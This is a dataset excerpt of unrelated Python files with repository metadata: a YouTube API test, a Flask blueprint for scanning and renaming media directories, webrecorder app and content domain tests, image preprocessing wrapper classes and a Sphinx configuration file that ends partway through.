c4341227c83a72f5ff783fa3c176dec6d3fcf6cb
| 1,132
|
py
|
Python
|
tests/test_youtube.py
|
santosderek/Vitality
|
cc90d3b561c3b75f000288345d7a1442fb2b3fec
|
[
"MIT"
] | 1
|
2020-09-18T17:08:53.000Z
|
2020-09-18T17:08:53.000Z
|
tests/test_youtube.py
|
santosderek/Vitality
|
cc90d3b561c3b75f000288345d7a1442fb2b3fec
|
[
"MIT"
] | 91
|
2020-09-25T23:12:58.000Z
|
2020-12-19T04:57:50.000Z
|
tests/test_youtube.py
|
santosderek/4155-Team
|
cc90d3b561c3b75f000288345d7a1442fb2b3fec
|
[
"MIT"
] | 3
|
2020-09-26T22:35:42.000Z
|
2020-10-13T18:22:22.000Z
|
from vitality.youtube import *
from os import environ, getenv
from os.path import exists
from vitality.settings import GOOGLE_MAPS_KEY
from dotenv import load_dotenv
from time import sleep
import pytest
@pytest.mark.skip
def test_search_topic():
sleep(.5)
load_dotenv('.env')
youtube = Youtube(getenv("GOOGLE_YOUTUBE_KEY"))
response = youtube.search_topic('Low Carb Recipe')
assert len(response) == 6
assert 'items' in response
assert 'etag' in response
# from pprint import pprint
# pprint (response)
# assert False
def test_fallback_dicts():
assert 'kind' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'etag' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'nextPageToken' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'regionCode' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'pageInfo' in DEFAULT_YOUTUBE_WORKOUT_SEARCH
assert 'kind' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'etag' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'nextPageToken' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'regionCode' in DEFAULT_YOUTUBE_DIET_SEARCH
assert 'pageInfo' in DEFAULT_YOUTUBE_DIET_SEARCH
| 33.294118
| 60
| 0.772085
|
67e6e03ea6343564fe83ac2bc7fdb918be00e963
| 6,818
|
py
|
Python
|
JavHelper/views/scan_directory.py
|
SteVeNRK/JAVOneStop
|
eb93339e4250b85cf055c434d8e32941dc404248
|
[
"MIT"
] | 1
|
2021-12-02T06:44:25.000Z
|
2021-12-02T06:44:25.000Z
|
JavHelper/views/scan_directory.py
|
SteVeNRK/JAVOneStop
|
eb93339e4250b85cf055c434d8e32941dc404248
|
[
"MIT"
] | null | null | null |
JavHelper/views/scan_directory.py
|
SteVeNRK/JAVOneStop
|
eb93339e4250b85cf055c434d8e32941dc404248
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
import os
import json
from ast import literal_eval
from flask import Blueprint, jsonify, request, Response
from JavHelper.core.OOF_downloader import OOFDownloader
from JavHelper.core.javlibrary import JavLibraryScraper
from JavHelper.core import IniNotFoundException
from JavHelper.core.file_scanner import EmbyFileStructure
from JavHelper.core.ini_file import load_ini_file, return_config_string, set_value_ini_file, return_default_config_string
from JavHelper.core.nfo_parser import EmbyNfo
"""
This blueprint is pretty dangerous since it needs permission to read/write non-app directories
"""
directory_scan = Blueprint('directory_scan', __name__, url_prefix='/directory_scan')
@directory_scan.route('/remove_existing_tag', methods=['GET'])
def remove_existing_tag():
"""
    This endpoint is used to scan JAVs that already exist locally and update the db
"""
emby_folder = EmbyFileStructure(return_default_config_string('file_path'))
# scan folder
emby_folder.remove_tags()
return 'ok'
@directory_scan.route('/rescan_emby_folder', methods=['GET'])
def rescan_emby_folder():
"""
    This endpoint is used to scan JAVs that already exist locally and update the db
"""
emby_folder = EmbyFileStructure(return_default_config_string('file_path'))
# scan folder
emby_folder.scan_emby_root_path()
return jsonify({'success': [jav_obj['directory'] for jav_obj in emby_folder.file_list]})
@directory_scan.route('/verify_local_nfo', methods=['GET'])
def verify_local_nfo():
directory = request.args.get('directory')
filename = request.args.get('filename')
root = return_default_config_string('file_path')
# special processing to convert linux db path to windows
directory = directory.replace('/', os.sep).replace('\\', os.sep)
print(os.path.join(root, directory, filename))
whether_exists = os.path.isfile(os.path.join(root, directory, filename))
return jsonify({'success': whether_exists})
@directory_scan.route('/update_oof_cookies', methods=['POST'])
def update_oof_cookies():
req_data = json.loads(request.get_data() or '{}')
update_dict = json.loads(req_data['update_dict'])
status = OOFDownloader.update_local_cookies(update_dict)
return jsonify({'status': status})
@directory_scan.route('/update_javlib_cf_cookies', methods=['POST'])
def update_javlib_cf_cookies():
req_data = json.loads(request.get_data() or '{}')
update_dict = json.loads(req_data['update_dict'])
status = JavLibraryScraper.update_local_cookies(update_dict)
return jsonify({'status': status})
@directory_scan.route('/read_oof_cookies', methods=['GET'])
def read_oof_cookies():
return jsonify({'oof_cookies': OOFDownloader.load_local_cookies(
return_all=request.args.get('return_all', False)
)}) # convert returned obj to dict format
@directory_scan.route('/read_javlib_cf_cookies', methods=['GET'])
def read_javlib_cf_cookies():
return jsonify({'javlib_cf_cookies': JavLibraryScraper.load_local_cookies(
return_all=request.args.get('return_all', False)
)}) # convert returned obj to dict format
@directory_scan.route('/update_local_ini', methods=['POST'])
def update_local_ini():
req_data = json.loads(request.get_data() or '{}')
update_dict = req_data['update_dict']
status = set_value_ini_file(update_dict)
return jsonify({'status': status})
@directory_scan.route('/read_local_ini', methods=['GET'])
def read_local_ini():
if request.args.get('filter_dict'):
res = {}
errors = []
filter_dict = literal_eval(request.args.get('filter_dict'))
for k, v in filter_dict.items():
try:
res[k] = return_config_string(v)
except IniNotFoundException as e:
errors.append(str(e))
return jsonify({'local_config': res, 'error': errors})
else:
return jsonify({'local_config': load_ini_file()._sections}) # convert returned obj to dict format
@directory_scan.route('/rename_path_preview', methods=['GET'])
def rename_path_preview():
path = request.args.get('path')
# handle usual error
if not os.path.exists(path):
return jsonify({'response': [{'file_name': f'{path} does not exist'}]}), 400
if not os.path.isdir(path):
return jsonify({'response': [{'file_name': f'{path} is not a valid directory for scan'}]}), 400
res = EmbyFileStructure(path).rename_directory_preview()
return jsonify({'response': res,
'header': [
{'name': 'Current File Name', 'selector': 'file_name', 'sortable': True},
{'name': 'New File Name', 'selector': 'new_file_name', 'sortable': True}
]})
@directory_scan.route('/rename_path_on_json', methods=['POST'])
def rename_path_on_json():
req_data = json.loads(request.get_data() or '{}')
file_objs = req_data['file_objs']
path = req_data['path']
# handle usual error
if not os.path.exists(path):
return jsonify({'response': [{'file_name': f'{path} does not exist'}]}), 400
if not os.path.isdir(path):
return jsonify({'response': [{'file_name': f'{path} is not a valid directory for scan'}]}), 400
def long_process():
for each_file_process in EmbyFileStructure.rename_directory(path, file_objs):
yield json.dumps({'log': each_file_process})+'\n'
return Response(long_process(), mimetype='text/event-stream')
@directory_scan.route('/pre_scan_files', methods=['GET'])
def pre_scan_files():
path = request.args.get('path')
file_list = []
# handle usual error
if not os.path.exists(path):
return jsonify({'response': [{'file_name': f'{path} does not exist'}]}), 400
if not os.path.isdir(path):
return jsonify({'response': [{'file_name': f'{path} is not a valid directory for scan'}]}), 400
for file_name in os.listdir(path):
# filter out dot file
if file_name.startswith('.'):
continue
# don't care about directory size
elif os.path.isdir(os.path.join(path, file_name)):
#file_list.append({'file_name': file_name, 'size': 'folder - will not process'})
            # no longer care about directories, just skip them
pass
else:
file_size = os.path.getsize(os.path.join(path, file_name)) >> 20
_car = os.path.splitext(file_name)[0]
file_list.append({'file_name': file_name, 'car': _car, 'size': f'{file_size}MB'})
return jsonify({'response': file_list,
'header': [
{'name': 'File Name', 'selector': 'file_name', 'sortable': True},
{'name': 'Size', 'selector': 'size', 'sortable': True}
]
})
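# Illustrative response shape for /directory_scan/pre_scan_files (file names and
# sizes are hypothetical; 'header' appears to describe the table columns that
# the frontend renders):
#   {"response": [{"file_name": "ABC-123.mp4", "car": "ABC-123", "size": "1400MB"}],
#    "header": [{"name": "File Name", "selector": "file_name", "sortable": true},
#               {"name": "Size", "selector": "size", "sortable": true}]}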
| 38.089385
| 121
| 0.668378
|
e89f6cf79359ebf18e77c74e8c212a846c3cc711
| 6,899
|
py
|
Python
|
webrecorder/test/test_app_content_domain.py
|
gitter-badger/webrecorder
|
9c4fc3b816a77f312ec864ca8598f7bbc1b41394
|
[
"Apache-2.0"
] | 1
|
2021-01-01T21:32:53.000Z
|
2021-01-01T21:32:53.000Z
|
webrecorder/test/test_app_content_domain.py
|
n0ncetonic/webrecorder
|
7459a0f6bc162eec2d383bd908d82d95cdc15940
|
[
"Apache-2.0"
] | null | null | null |
webrecorder/test/test_app_content_domain.py
|
n0ncetonic/webrecorder
|
7459a0f6bc162eec2d383bd908d82d95cdc15940
|
[
"Apache-2.0"
] | null | null | null |
from .testutils import FullStackTests
import os
import re
# ============================================================================
class TestAppContentDomain(FullStackTests):
"""
Tests for separate app/content domain deployment
"""
runner_env_params = {'TEMP_SLEEP_CHECK': '1',
'APP_HOST': 'app-host',
'CONTENT_HOST': 'content-host'}
anon_user = None
@classmethod
def setup_class(cls, **kwargs):
os.environ['CONTENT_HOST'] = 'content-host'
os.environ['APP_HOST'] = 'app-host'
kwargs['init_anon'] = False
super(TestAppContentDomain, cls).setup_class(**kwargs)
@classmethod
def teardown_class(cls, *args, **kwargs):
super(TestAppContentDomain, cls).teardown_class(*args, **kwargs)
os.environ['CONTENT_HOST'] = ''
os.environ['APP_HOST'] = ''
def app_get(self, url):
url = url.format(user=self.anon_user)
        headers = {'Host': 'app-host'}
        return self.testapp.get(url, headers=headers)
def content_get(self, url):
url = url.format(user=self.anon_user)
return self.testapp.get(url, headers={'Host': 'content-host'})
def test_home_page_redir_to_app(self):
res = self.content_get('/')
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/'
def test_record_app_top_frame(self):
res = self.app_get('/_new/temp/rec/record/http://httpbin.org/get?food=bar')
res = self.app_get(res.headers['Location'])
assert res.status_code == 200
        m = re.search(r'temp-[\w\d]+', res.text)
TestAppContentDomain.anon_user = m.group(0)
assert 'wbinfo.app_prefix = decodeURI("http://app-host/{user}/temp/rec/record/");'.format(user=self.anon_user) in res.text
assert 'wbinfo.content_prefix = decodeURI("http://content-host/{user}/temp/rec/record/");'.format(user=self.anon_user) in res.text
def test_record_set_session_content_frame(self):
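        # The cookie handshake exercised here (app-host / content-host are the
        # test stand-ins for the two domains):
        #   content-host frame URL -> 302 to app-host /_set_session
        #   app-host /_set_session -> 302 back to content-host /_set_session
        #   content-host /_set_session -> sets the session cookie and 302s to
        #                                 the originally requested frame URL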
res = self.content_get('/{user}/temp/rec/record/mp_/http://httpbin.org/get?food=bar')
assert res.status_code == 302
assert 'http://app-host/_set_session' in res.headers['Location']
res = self.app_get(res.headers['Location'])
assert res.status_code == 302
assert 'http://content-host/_set_session' in res.headers['Location']
res = self.content_get(res.headers['Location'])
content_host_str = 'http://content-host/{user}/temp/rec/record/mp_/http://httpbin.org/get?food=bar'.format(user=self.anon_user)
assert res.status_code == 302
assert self.testapp.cookies['__test_sesh'] in res.headers['Set-Cookie']
assert res.headers['Location'] == content_host_str
res = self.content_get(res.headers['Location'])
assert '"food": "bar"' in res.text
def test_replay_app_frame(self):
res = self.app_get('/{user}/temp/http://httpbin.org/get?food=bar')
assert res.headers.get('Content-Security-Policy') == None
assert 'wbinfo.app_prefix = decodeURI("http://app-host/{user}/temp/");'.format(user=self.anon_user) in res.text
assert 'wbinfo.content_prefix = decodeURI("http://content-host/{user}/temp/");'.format(user=self.anon_user) in res.text
def test_replay_content_frame(self):
res = self.content_get('/{user}/temp/mp_/http://httpbin.org/get?food=bar')
assert '"food": "bar"' in res.text
csp = "default-src 'unsafe-eval' 'unsafe-inline' 'self' data: blob: mediastream: ws: wss: app-host/_set_session; form-action 'self'"
assert res.headers['Content-Security-Policy'] == csp
def test_redir_to_content_frame(self):
res = self.app_get('/{user}/temp/mp_/http://httpbin.org/get?food=bar')
assert res.status_code == 302
assert res.headers['Location'] == 'http://content-host/{user}/temp/mp_/http://httpbin.org/get?food=bar'.format(user=self.anon_user)
def test_redir_to_app_frame(self):
res = self.content_get('/{user}/temp/http://httpbin.org/get?food=bar')
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/{user}/temp/http://httpbin.org/get?food=bar'.format(user=self.anon_user)
def test_app_coll_page(self):
res = self.app_get('/{user}/temp/'.format(user=self.anon_user))
assert res.status_code == 200
def test_content_redir_to_app_user_page(self):
res = self.content_get('/{user}'.format(user=self.anon_user))
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/{user}'.format(user=self.anon_user)
def test_content_redir_to_app_coll_page(self):
res = self.content_get('/{user}/temp/'.format(user=self.anon_user))
assert res.status_code == 302
assert res.headers['Location'] == 'http://app-host/{user}/temp/'.format(user=self.anon_user)
def test_options_allow_content_domain_set_session(self):
res = self.testapp.options('/_set_session?path=/{user}/temp/http://httpbin.org/'.format(user=self.anon_user),
headers={'Host': 'app-host',
'Origin': 'http://content-host/',
'Access-Control-Request-Headers': 'x-pywb-requested-with',
'Access-Control-Request-Method': 'GET'})
assert res.headers['Access-Control-Allow-Origin'] == 'http://content-host/'
assert res.headers['Access-Control-Allow-Methods'] == 'GET'
assert res.headers['Access-Control-Allow-Headers'] == 'x-pywb-requested-with'
assert res.headers['Access-Control-Allow-Credentials'] == 'true'
def test_options_dont_allow_wrong_host(self):
res = self.testapp.options('/_set_session?path=/{user}/temp/http://httpbin.org/'.format(user=self.anon_user),
headers={'Host': 'content-host',
'Origin': 'http://content-host/',
'Access-Control-Request-Headers': 'x-pywb-requested-with',
'Access-Control-Request-Method': 'GET'})
assert 'Access-Control-Allow-Origin' not in res.headers
def test_options_dont_allow_wrong_origin(self):
res = self.testapp.options('/_set_session?path=/{user}/temp/http://httpbin.org/'.format(user=self.anon_user),
headers={'Host': 'app-host',
'Origin': 'http://wrong-host/',
'Access-Control-Request-Headers': 'x-pywb-requested-with',
'Access-Control-Request-Method': 'GET'})
assert 'Access-Control-Allow-Origin' not in res.headers
| 48.584507
| 140
| 0.607624
|
2ce2ea2a9fb4e71b4ed0f2a96142d969e2993b95
| 136
|
py
|
Python
|
test/test_utils.py
|
Funk66/ledger
|
b06f39281b81cebb75a6c5f92fa3b8e47b65800c
|
[
"MIT"
] | null | null | null |
test/test_utils.py
|
Funk66/ledger
|
b06f39281b81cebb75a6c5f92fa3b8e47b65800c
|
[
"MIT"
] | 3
|
2021-11-16T06:38:48.000Z
|
2021-11-16T06:43:18.000Z
|
test/test_utils.py
|
Funk66/ledger
|
b06f39281b81cebb75a6c5f92fa3b8e47b65800c
|
[
"MIT"
] | null | null | null |
from datetime import date
from ledger.utils import isodate
def test_isodate():
assert date(2020, 2, 20) == isodate('2020-02-20')
| 17
| 53
| 0.713235
|
754a84a0e70a4f9a2a165fd48f20861ee8961f3d
| 14,122
|
py
|
Python
|
pyzoo/zoo/feature/image/imagePreprocessing.py
|
abdolence/analytics-zoo
|
364856abcbe9aff7f7b6cf9b9f8648d51e07ca64
|
[
"Apache-2.0"
] | 2
|
2018-06-08T01:14:48.000Z
|
2019-08-28T22:24:14.000Z
|
pyzoo/zoo/feature/image/imagePreprocessing.py
|
abdolence/analytics-zoo
|
364856abcbe9aff7f7b6cf9b9f8648d51e07ca64
|
[
"Apache-2.0"
] | 3
|
2018-10-19T08:30:38.000Z
|
2018-10-19T08:32:12.000Z
|
pyzoo/zoo/feature/image/imagePreprocessing.py
|
abdolence/analytics-zoo
|
364856abcbe9aff7f7b6cf9b9f8648d51e07ca64
|
[
"Apache-2.0"
] | 1
|
2018-06-26T08:16:42.000Z
|
2018-06-26T08:16:42.000Z
|
#
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from bigdl.util.common import *
from zoo.feature.common import Preprocessing
if sys.version >= '3':
long = int
unicode = str
class ImagePreprocessing(Preprocessing):
"""
    ImagePreprocessing is a transformer that transforms an ImageFeature
"""
def __init__(self, bigdl_type="float", *args):
super(ImagePreprocessing, self).__init__(bigdl_type, *args)
class ImageBytesToMat(ImagePreprocessing):
"""
    Transform a byte array (the original image file in bytes) to OpenCV Mat
:param byte_key key that maps byte array
:param image_codec specifying the color type of a loaded image, same as in OpenCV.imread.
    The default is Imgcodecs.CV_LOAD_IMAGE_UNCHANGED
"""
def __init__(self, byte_key="bytes", image_codec=-1, bigdl_type="float"):
super(ImageBytesToMat, self).__init__(bigdl_type, byte_key, image_codec)
class ImageResize(ImagePreprocessing):
"""
Resize image
:param resize_h height after resize
:param resize_w width after resize
:param resize_mode if resizeMode = -1, random select a mode from (Imgproc.INTER_LINEAR,
Imgproc.INTER_CUBIC, Imgproc.INTER_AREA, Imgproc.INTER_NEAREST, Imgproc.INTER_LANCZOS4)
    :param use_scale_factor if true, the scale factors fx and fy are used, with fx = fy = 0;
    note that the results of the following two calls are different
Imgproc.resize(mat, mat, new Size(resizeWH, resizeWH), 0, 0, Imgproc.INTER_LINEAR)
Imgproc.resize(mat, mat, new Size(resizeWH, resizeWH))
"""
def __init__(self, resize_h, resize_w, resize_mode=1, use_scale_factor=True,
bigdl_type="float"):
super(ImageResize, self).__init__(bigdl_type, resize_h, resize_w,
resize_mode, use_scale_factor)
class ImageBrightness(ImagePreprocessing):
"""
adjust the image brightness
    :param delta_low brightness parameter: low bound
    :param delta_high brightness parameter: high bound
"""
def __init__(self, delta_low, delta_high, bigdl_type="float"):
super(ImageBrightness, self).__init__(bigdl_type, float(delta_low), float(delta_high))
class ImageChannelNormalize(ImagePreprocessing):
"""
image channel normalize
:param mean_r mean value in R channel
:param mean_g mean value in G channel
    :param mean_b mean value in B channel
:param std_r std value in R channel
:param std_g std value in G channel
:param std_b std value in B channel
"""
def __init__(self, mean_r, mean_g, mean_b, std_r=1.0,
std_g=1.0, std_b=1.0, bigdl_type="float"):
super(ImageChannelNormalize, self).__init__(bigdl_type, float(mean_r), float(mean_g),
float(mean_b), float(std_r), float(std_g),
float(std_b))
class PerImageNormalize(ImagePreprocessing):
"""
Normalizes the norm or value range per image, similar to opencv::normalize
https://docs.opencv.org/ref/master/d2/de8/group__core__array.html
#ga87eef7ee3970f86906d69a92cbf064bd
    PerImageNormalize normalizes (scales and shifts) the input features. Various
    normalization methods are supported,
    e.g. NORM_INF, NORM_L1, NORM_L2 or NORM_MINMAX.
    Please note that this is a per-image normalization.
:param min lower range boundary in case of the range normalization or
norm value to normalize
:param max upper range boundary in case of the range normalization.
It is not used for the norm normalization.
:param norm_type normalization type, see opencv:NormTypes.
https://docs.opencv.org/ref/master/d2/de8/group__core__array.html
#gad12cefbcb5291cf958a85b4b67b6149f
Default Core.NORM_MINMAX
"""
def __init__(self, min, max, norm_type=32, bigdl_type="float"):
super(PerImageNormalize, self).__init__(bigdl_type, float(min), float(max), norm_type)
class ImageMatToTensor(ImagePreprocessing):
"""
MatToTensor
    :param to_RGB convert BGR to RGB (default is BGR, i.e. no conversion)
:param tensorKey key to store transformed tensor
:param format DataFormat.NCHW or DataFormat.NHWC
"""
def __init__(self, to_RGB=False, tensor_key="imageTensor",
share_buffer=True, format="NCHW", bigdl_type="float"):
super(ImageMatToTensor, self).__init__(bigdl_type, to_RGB, tensor_key,
share_buffer, format)
class ImageSetToSample(ImagePreprocessing):
"""
transform imageframe to samples
:param input_keys keys that maps inputs (each input should be a tensor)
:param target_keys keys that maps targets (each target should be a tensor)
:param sample_key key to store sample
"""
def __init__(self, input_keys=["imageTensor"], target_keys=None,
sample_key="sample", bigdl_type="float"):
super(ImageSetToSample, self).__init__(bigdl_type, input_keys, target_keys, sample_key)
class ImageHue(ImagePreprocessing):
"""
adjust the image hue
    :param delta_low hue parameter: low bound
    :param delta_high hue parameter: high bound
"""
def __init__(self, delta_low, delta_high, bigdl_type="float"):
super(ImageHue, self).__init__(bigdl_type, float(delta_low), float(delta_high))
class ImageSaturation(ImagePreprocessing):
"""
    adjust the image saturation
    :param delta_low saturation parameter: low bound
    :param delta_high saturation parameter: high bound
"""
def __init__(self, delta_low, delta_high, bigdl_type="float"):
super(ImageSaturation, self).__init__(bigdl_type, float(delta_low), float(delta_high))
class ImageChannelOrder(ImagePreprocessing):
"""
    randomly change the channel order of an image
"""
def __init__(self, bigdl_type="float"):
super(ImageChannelOrder, self).__init__(bigdl_type)
class ImageColorJitter(ImagePreprocessing):
"""
Random adjust brightness, contrast, hue, saturation
:param brightness_prob probability to adjust brightness
:param brightness_delta brightness parameter
:param contrast_prob probability to adjust contrast
:param contrast_lower contrast lower parameter
:param contrast_upper contrast upper parameter
:param hue_prob probability to adjust hue
:param hue_delta hue parameter
:param saturation_prob probability to adjust saturation
:param saturation_lower saturation lower parameter
:param saturation_upper saturation upper parameter
:param random_order_prob random order for different operation
:param shuffle shuffle the transformers
"""
def __init__(self, brightness_prob=0.5,
brightness_delta=32.0,
contrast_prob=0.5,
contrast_lower=0.5,
contrast_upper=1.5,
hue_prob=0.5,
hue_delta=18.0,
saturation_prob=0.5,
saturation_lower=0.5,
saturation_upper=1.5,
random_order_prob=0.0,
shuffle=False,
bigdl_type="float"):
super(ImageColorJitter, self).__init__(bigdl_type,
float(brightness_prob), float(brightness_delta),
float(contrast_prob), float(contrast_lower),
float(contrast_upper), float(hue_prob),
float(hue_delta), float(saturation_prob),
float(saturation_lower), float(saturation_upper),
float(random_order_prob), shuffle)
class ImageAspectScale(ImagePreprocessing):
"""
    Resize the image, keeping the aspect ratio; scale according to the short edge
:param min_size scale size, apply to short edge
:param scale_multiple_of make the scaled size multiple of some value
:param max_size max size after scale
:param resize_mode if resizeMode = -1, random select a mode from
(Imgproc.INTER_LINEAR, Imgproc.INTER_CUBIC, Imgproc.INTER_AREA,
Imgproc.INTER_NEAREST, Imgproc.INTER_LANCZOS4)
:param use_scale_factor if true, scale factor fx and fy is used, fx = fy = 0
    :param min_scale control the minimum scale-up for the image
"""
def __init__(self, min_size, scale_multiple_of=1, max_size=1000,
resize_mode=1, use_scale_factor=True, min_scale=-1.0,
bigdl_type="float"):
super(ImageAspectScale, self).__init__(bigdl_type,
min_size, scale_multiple_of, max_size,
resize_mode, use_scale_factor, min_scale)
class ImageRandomAspectScale(ImagePreprocessing):
"""
resize the image by randomly choosing a scale
:param scales array of scale options that for random choice
    :param scale_multiple_of resize test images so that their width and height are multiples of this value
    :param max_size max pixel size of the longest side of a scaled input image
"""
def __init__(self, scales, scale_multiple_of=1, max_size=1000, bigdl_type="float"):
super(ImageRandomAspectScale, self).__init__(bigdl_type,
scales, scale_multiple_of, max_size)
class ImagePixelNormalize(ImagePreprocessing):
"""
Pixel level normalizer, data(i) = data(i) - mean(i)
:param means pixel level mean, following H * W * C order
"""
def __init__(self, means, bigdl_type="float"):
super(ImagePixelNormalize, self).__init__(bigdl_type, means)
class ImageRandomCrop(ImagePreprocessing):
"""
Random crop a `cropWidth` x `cropHeight` patch from an image.
The patch size should be less than the image size.
:param crop_width width after crop
:param crop_height height after crop
:param is_clip whether to clip the roi to image boundaries
"""
def __init__(self, crop_width, crop_height, is_clip=True, bigdl_type="float"):
super(ImageRandomCrop, self).__init__(bigdl_type,
crop_width, crop_height, is_clip)
class ImageCenterCrop(ImagePreprocessing):
"""
Crop a `cropWidth` x `cropHeight` patch from center of image.
The patch size should be less than the image size.
:param crop_width width after crop
:param crop_height height after crop
:param is_clip clip cropping box boundary
"""
def __init__(self, crop_width, crop_height, is_clip=True, bigdl_type="float"):
super(ImageCenterCrop, self).__init__(bigdl_type,
crop_width, crop_height, is_clip)
class ImageFixedCrop(ImagePreprocessing):
"""
Crop a fixed area of image
:param x1 start in width
:param y1 start in height
:param x2 end in width
:param y2 end in height
:param normalized whether args are normalized, i.e. in range [0, 1]
:param is_clip whether to clip the roi to image boundaries
"""
def __init__(self, x1, y1, x2, y2, normalized=True, is_clip=True, bigdl_type="float"):
super(ImageFixedCrop, self).__init__(bigdl_type,
x1, y1, x2, y2, normalized, is_clip)
class ImageExpand(ImagePreprocessing):
"""
    Expand the image and fill the blank part with means_r, means_g, means_b
:param means_r means in R channel
:param means_g means in G channel
:param means_b means in B channel
:param min_expand_ratio min expand ratio
:param max_expand_ratio max expand ratio
"""
def __init__(self, means_r=123, means_g=117, means_b=104,
min_expand_ratio=1.0,
max_expand_ratio=4.0, bigdl_type="float"):
super(ImageExpand, self).__init__(bigdl_type, means_r, means_g, means_b,
min_expand_ratio, max_expand_ratio)
class ImageFiller(ImagePreprocessing):
"""
Fill part of image with certain pixel value
:param start_x start x ratio
:param start_y start y ratio
:param end_x end x ratio
:param end_y end y ratio
:param value filling value
"""
def __init__(self, start_x, start_y, end_x, end_y, value=255, bigdl_type="float"):
super(ImageFiller, self).__init__(bigdl_type, start_x, start_y,
end_x, end_y, value)
class ImageHFlip(ImagePreprocessing):
"""
Flip the image horizontally
"""
def __init__(self, bigdl_type="float"):
super(ImageHFlip, self).__init__(bigdl_type)
class ImageFeatureToTensor(Preprocessing):
"""
    a Transformer that converts an ImageFeature to a Tensor.
"""
def __init__(self, bigdl_type="float"):
super(ImageFeatureToTensor, self).__init__(bigdl_type)
class RowToImageFeature(Preprocessing):
"""
a Transformer that converts a Spark Row to a BigDL ImageFeature.
"""
def __init__(self, bigdl_type="float"):
super(RowToImageFeature, self).__init__(bigdl_type)
class ImageRandomPreprocessing(Preprocessing):
"""
Randomly apply the preprocessing to some of the input ImageFeatures, with probability specified.
    E.g. if prob = 0.5, the preprocessing will be applied to roughly half of the input ImageFeatures.
:param preprocessing preprocessing to apply.
:param prob probability to apply the preprocessing action.
"""
def __init__(self, preprocessing, prob, bigdl_type="float"):
super(ImageRandomPreprocessing, self).__init__(bigdl_type, preprocessing, float(prob))
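# --- Illustrative usage sketch (not part of the original module) ---
# Shows how a typical image pipeline can be assembled from the transformers
# defined above. `ChainedPreprocessing` is assumed to live in zoo.feature.common
# alongside `Preprocessing`; the sizes and mean values below are illustrative
# only, and constructing these objects requires a running BigDL/Spark context.
if __name__ == "__main__":
    from zoo.feature.common import ChainedPreprocessing

    pipeline = ChainedPreprocessing([
        ImageBytesToMat(),                                 # decode raw bytes to an OpenCV Mat
        ImageResize(resize_h=256, resize_w=256),           # resize to a fixed shape
        ImageCenterCrop(crop_width=224, crop_height=224),  # crop the center patch
        ImageChannelNormalize(123.0, 117.0, 104.0),        # subtract per-channel means
        ImageMatToTensor(format="NCHW"),                   # Mat -> tensor
        ImageSetToSample(input_keys=["imageTensor"]),      # wrap tensors into Samples
    ])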
| 39.227778
| 100
| 0.673276
|
f49ac961339d04644665f2d9828d7db9048de93a
| 10,668
|
py
|
Python
|
doc/conf.py
|
bio-phys/cadishi
|
b44351fcb77737c6a6da5249a0c24ee8e34f72d2
|
[
"MIT"
] | 14
|
2017-08-22T13:00:42.000Z
|
2021-11-19T14:07:55.000Z
|
doc/conf.py
|
bio-phys/cadishi
|
b44351fcb77737c6a6da5249a0c24ee8e34f72d2
|
[
"MIT"
] | 1
|
2021-11-19T14:07:38.000Z
|
2021-11-19T14:07:38.000Z
|
doc/conf.py
|
bio-phys/cadishi
|
b44351fcb77737c6a6da5249a0c24ee8e34f72d2
|
[
"MIT"
] | null | null | null |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding: utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4 fileencoding=utf-8
#
# CADISHI --- CAlculation of DIStance HIstograms
#
# Copyright (c) Klaus Reuter, Juergen Koefinger
# See the file AUTHORS.rst for the full list of contributors.
#
# Released under the MIT License, see the file LICENSE.txt.
# CADISHI documentation build configuration file, created by
# sphinx-quickstart on Wed Feb 15 09:03:45 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# We handle version information in a single file as is commonly done, see e.g.
# https://packaging.python.org/single_source_version/#single-sourcing-the-version
ver = {}
with open("../cadishi/version.py") as fp:
exec(fp.read(), ver)
version_string = ver['get_short_version_string']()
release_string = ver['get_version_string']()
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'CADISHI'
copyright = u'2017, Klaus Reuter, Juergen Koefinger'
author = u'Klaus Reuter, Juergen Koefinger'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
#version = u'1.0'
version = version_string
# The full version, including alpha/beta/rc tags.
#release = u'1.0.0'
release = release_string
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#
# today = ''
#
# Else, today_fmt is used as the format for a strftime call.
#
# today_fmt = '%B %d, %Y'
